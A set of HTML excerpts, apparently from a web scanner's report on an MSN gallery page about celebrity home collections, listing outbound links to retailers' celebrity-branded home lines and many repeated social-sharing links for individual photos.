</B> <A HREF="http://www.calicocorners.com/category/designer+fabrics+for+the+home/thom+filicia.do" TARGET="_blank">Thom Filicia Home Collection at Calico Corners</A>
...[SNIP]...
</B> <A HREF="http://www.seanjohn.com/" TARGET="_blank">Sean John Home Collection</A>
...[SNIP]...
</B><A HREF="http://kitchen-dining.hsn.com/easy-exotic-by-padma-lakshmi_c-qc_a-7056_xc.aspx?rid=1660&prev=hp" TARGET="_blank">Easy Exotic by Padma Lakshmi for HSN</A>
...[SNIP]...
</B><A HREF="http://www1.macys.com/search/index.ognc?SearchTarget=*&Keyword=vida&KEYWORD_GO_BUTTON.x=0&KEYWORD_GO_BUTTON.y=0&KEYWORD_GO_BUTTON=KEYWORD_GO_BUTTON" TARGET="_blank">Vida by Eva Mendes</A>
...[SNIP]...
</B> <A HREF="http://home-decor.hsn.com/nate-berkus_c-hd_a-5936_xc.aspx" TARGET="_blank">Nate Berkus for HSN</A>
...[SNIP]...
</B> <A HREF="http://homecourtbylebron.com/" TARGET="_blank">Home Court by LeBron James</A>
...[SNIP]...
</B> <A HREF="http://home-decor.hsn.com/happy-chic-by-jonathan-adler_c-hd_a-7652_xc.aspx?rid=1822&prev=hp" TARGET="_blank">Happy Chic by Jonathan Adler for HSN</A>
...[SNIP]...
</B> <A HREF="http://www.buybuybaby.com/searchSKU.asp?SSTR=too+good&go=1&" TARGET="_blank">TOO GOOD by Jenny McCarthy</A>
...[SNIP]...
</B> <A HREF="http://www.houseofdereon.com/" TARGET="_blank">House of Dereon home collection</A>
...[SNIP]...
</B><A HREF="http://www.calicocorners.com/category/designer+fabrics+for+the+home/iman+home.do?leftnav=1" TARGET="_blank">Iman Home at Calico Corners</A>
...[SNIP]...
</B><A HREF="http://www.kohls.com/kohlsStore/landingpages/daisyfuentes/bedding.jsp?bmForm=guided_nav_search&SubcatFolderID=2534374752624182" TARGET="_blank">Daisy Fuentes for Kohl...s</A>
...[SNIP]...
</B><A HREF="http://www4.jcpenney.com/jcp/XGN.aspx?SearchString=cindy+crawford&submit+search.x=6&submit+search.y=8&JSEnabled=false&mscssid=671e48f77f36d4c77b509a63a63027934xMnVNoVza3WxMnVNoVza3o200B84F0DBCCEAE7137084CF363408FA07DB1101115&cmResetCat=true&hdnOnGo=true" TARGET="_blank">Cindy Crawford Style collection for JCPenney</A>
...[SNIP]...
</B><A HREF="http://www.joann.com/joann/search/searchall.jsp?keyword=christie&catPath=All%20Products////Product%20Home////UserSearch1=christie&_requestid=8350927" TARGET="_blank">Christie Brinkley Fabric for Jo-Ann</A>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3Focid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3Focid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979" target="_blank">Reddit</a>
...[SNIP]...
<li class="shareItem shareItem-facebook"><a href="http://www.facebook.com/sharer.php?t=Celebrity+Home+Collections&u=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976%26ocid%3Dfb-share-event" target="_blank">Facebook</a></li><li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?text=Celebrity+Home+Collections&original_referer=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976%26ocid%3Dtwtr-utweet" target="_blank">Twitter</a>
...[SNIP]...
